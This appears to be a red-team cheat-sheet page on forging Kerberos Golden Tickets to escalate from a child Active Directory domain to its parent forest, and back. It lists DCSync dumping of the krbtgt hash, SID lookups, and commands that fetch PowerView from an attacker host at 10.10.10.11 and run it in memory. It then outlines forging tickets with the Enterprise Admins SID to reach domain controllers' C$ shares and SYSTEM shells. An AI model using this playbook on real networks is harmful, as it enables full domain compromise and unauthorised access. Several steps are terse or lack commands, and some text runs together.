Golden Ticket
Child Domain to Parent Domain
1) Get krbtgt token from the child domain using DCSync
krbtgt -> ffffffffffffffffffffffffffffffff2) Try to access CIFS on DC02
ls //dc02.domain.com/c$3) Check the tickets
execute -o klist4) Get the SIDs for the forest domain and its child
Get-DomainSID -Domain child.domain.com
Get-DomainSid -Domain domain.com
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSid -Domain child.domain.com"'
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerView.ps1 -c "Get-DomainSid -Domain domain.com"'S-1-5-21-2032401531-514583578-4118012345
S-1-5-21-1135011135-3178090508-31514123455) Draft golden ticket - user can be anything bogus - sid is current domain SID and SIDs is child's - Also -519 is the EA group identifier and is static
6) Check the tickets
7) Try accessing the C$ now
8) Go into client -> nt auth\system shell and then
Parent Domain to Child Domain
1) DCSync to do SharpKatz - Only the DA -> Admin can do it hence we do runas above
2) Get the SIDs for the domain
3) Draft golden ticket - user can be anything bogus - sid and sids are same with sids containing group id for EA
4) Check the tickets
5) Try accessing the C$ now
6) Go into client -> nt auth\system shell and then
Last updated